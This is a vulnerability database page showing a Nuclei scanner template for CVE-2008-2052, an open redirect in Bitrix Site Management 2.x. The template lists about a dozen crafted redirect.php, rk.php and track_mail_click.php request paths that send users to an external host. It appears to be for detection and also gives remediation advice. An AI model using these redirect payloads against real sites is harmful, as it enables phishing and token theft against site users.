Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Bitrix Site Management 2.x - Open Redirect

🗓️ 03 Jun 2026 06:04:49Reported by ProjectDiscoveryType 
nuclei
 nuclei🔗 github.com👁 2 Views

Bitrix Site Management 2.x has an open redirect allowing redirects to arbitrary external sites via crafted parameters.

Related
Refs
Code
ReporterTitlePublishedViews
Family
CVE		CVE-2008-2052
2 May 200817:00
cve
Cvelist		CVE-2008-2052
2 May 200817:00
cvelist
NVD		CVE-2008-2052
2 May 200817:05
nvd
Prion		Open redirect
2 May 200817:05
prion
Positive Technologies		PT-2008-3569 · Bitrix +1 · Bitrix Site Manager +1
2 May 200800:00
ptsecurity
VulnCheck KEV		VulnCheck KEV: CVE-2008-2052
19 Sep 202400:00
vulncheck_kev
id: CVE-2008-2052

info:
  name: Bitrix Site Management 2.x - Open Redirect
  author: pikpikcu,gtrrnr,liangtovi-debug
  severity: medium
  description: |
    Bitrix Site Management 2.x contains an open redirect vulnerability allowing attackers to redirect users to arbitrary external sites via crafted redirect parameters.
  impact: |
    Successful exploitation can facilitate phishing and token theft by redirecting users to attacker-controlled destinations.
  remediation: |
    Upgrade Bitrix to a patched version and validate redirect targets against an allowlist.
  reference:
    - https://packetstormsecurity.com/files/151955/1C-Bitrix-Site-Management-Russia-2.0-Open-Redirection.html
    - https://holisticinfosec.blogspot.com/2008/07/bitrix-open-redirect-vulnerability.html
    - https://nvd.nist.gov/vuln/detail/CVE-2008-2052
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2008-2052
    cwe-id: CWE-601
  metadata:
    max-request: 14
    vendor: bitrix
    product: site_management
    shodan-query: "html:\"/bitrix/\""
  tags: cve,cve2008,redirect,bitrix,packetstorm,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}{{paths}}"
    payloads:
      paths:
        - '/bitrix/rk.php?goto=https://interact.sh'
        - '/bitrix/redirect.php?event1=&event2=&event3=&goto=https://interact.sh'
        - '/bitrix/redirect.php?event3=352513&goto=https://interact.sh'
        - '/bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://interact.sh'
        - '/bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=https://interact.sh'
        - '/bitrix/redirect.php?event1=&event2=&event3=download&goto=https://interact.sh'
        - '/bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://interact.sh'
        - '/bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://interact.sh'
        - '/bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://interact.sh'
        - '/bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://interact.sh'
        - '/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://interact.sh'
        - '/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://interact.sh'
        - '/bitrix/redirect.php?goto=https://{{Hostname}}%252F:[email protected]/'
        - '/bitrix/tools/track_mail_click.php?url=http://site%[email protected]/'

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
        part: header

      - type: status
        condition: or
        status:
          - 302
          - 301
# digest: 490a004630440220602e75d50763dcb10413a4a79472765d9c2eb1b3e134373de817bea321a08c1502203b4ec7ba96fce32b8431b47256265f9384cb2d6840dcb833ceff7f9976b0aaa5:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
22 May 2026 19:16Current
6.5Medium risk
Vulners AI Score6.5
CVSS 24.3
CVSS 3.16.1
EPSS0.01021
Bitrix Site ManagementOpen RedirectVulnerabilityPacketStorm
2